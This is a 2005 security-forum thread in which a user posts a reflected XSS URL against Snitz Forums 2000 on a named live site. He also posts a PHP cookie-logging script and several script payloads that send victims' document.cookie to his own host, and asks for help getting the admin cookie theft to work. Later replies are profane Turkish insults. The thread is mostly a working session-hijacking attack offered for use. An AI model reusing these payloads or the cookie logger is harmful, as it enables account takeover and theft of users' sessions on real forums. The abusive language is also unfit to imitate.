 |
|
 |
 |
Menu |
 |
|
 Home |
| |
|
 Discussions |
| |
|
 Tools |
| |
|
| Affiliates |
| |
|
 Content |
| |
|
 Info |
| | |
|
|
|
|
|
User Info |
|
 Membership:
 Latest: MichaelSnaRe
 New Today: 0
 New Yesterday: 0
 Overall: 9144
 People Online:
 Visitors: 45
 Members: 0
 Total: 45
|
|
|
|
|
|
Full disclosure |
|
|
|
 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
|
Snitz Forums 2000 xss code log cookie admin problem ? |
|
 Posted: Fri Nov 04, 2005 2:22 am |
 |
|
| ManyakHacker |
| Beginner |
 |
|
| Joined: Nov 04, 2005 |
| Posts: 2 |
|
|
|
 |
|
 |
|
Hello ALL ;
Snitz Forums 2000 v3.4.05
xss script bug
example :
http://www.groovefactory.com/forum/post.asp?method=Topic&FORUM_ID=1&CAT_ID=1&Forum_Title=General+chat&type="><SCRIPT>alert("Oh_My_God_Open_sxx_ehuhhahu")</SCRIPT>
i am script code log.php view
problem cookie copy script code ?
------------------------------------
<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$ip2 = getenv ('HTTP_USER_AGENT');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('log.php', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> browser: ' .$ip2. '<br> Date and Time: ' .$date. '<br> file: ' .$file. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
?>
ok working. upload my site ftp
hard.php
---------------------------------------
and empt log.php upload my site and ch mod 777 ok
working...
phpbb 2.0.16 working code ...
problem cookie script code
Xss attack
test 1 :
<script>document.location='http://www.mysite.com/hard.php?cookie='+escape(document.cookie)</script>
no working no cookie log ...
---------------------------------------
test 2
<SCRIPT>location.href='http://www.mysite.com/hard.php?cookie='escape(document.cookie)</script>
no working no cookie log ...
------------------------------------------
test 3
<script> document.location ='http://www.mysite.com/hard.php?cookie='+ document.cookie </script>
no working no cookie log ...
-------------------------------------
no no no test 4 - 5 - 6 - 7
no no no working   
please you hacker's test page working ??  
answer hi.
thank you |
|
|
|
|
|
|
|
|
| Posted: Sun Nov 06, 2005 2:38 am |
|
|
| ManyakHacker |
| Beginner |
|
|
| Joined: Nov 04, 2005 |
| Posts: 2 |
|
|
|
|
|
|
|
ohhhaa kımse bilmiyormu lam bu sorunun cevabını ???
ayıoğu ayılar sizi bende sizi bir bok sandımda soru sordum. hata bizde ne soruyorsun bu lamerlere soruyu
amınıza koyam emı ben sizin. nasıl olsa anlamazsınız
gotunezede koyam ipneler 2 gundur soru burda kımse bir bok cevap bile yazmadı gotunu siktiminan ipnaları sizi |
|
|
|
|
| Posted: Sun Nov 20, 2005 4:44 pm |
|
|
| devx |
| Beginner |
|
|
| Joined: Nov 20, 2005 |
| Posts: 1 |
|
|
|
|
|
|
|
| ManyakHacker wrote: | ohhhaa kımse bilmiyormu lam bu sorunun cevabını ???
ayıoğu ayılar sizi bende sizi bir bok sandımda soru sordum. hata bizde ne soruyorsun bu lamerlere soruyu
amınıza koyam emı ben sizin. nasıl olsa anlamazsınız
gotunezede koyam ipneler 2 gundur soru burda kımse bir bok cevap bile yazmadı gotunu siktiminan ipnaları sizi |
kardeş iyi g?zelde bende ingilizceden anlamıyom a.q.
sen en iyisi government.org 'a takıl orası iyi.... |
|
|
|
|
www.waraxe.us Forum Index -> Cross-site scripting aka XSS
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|
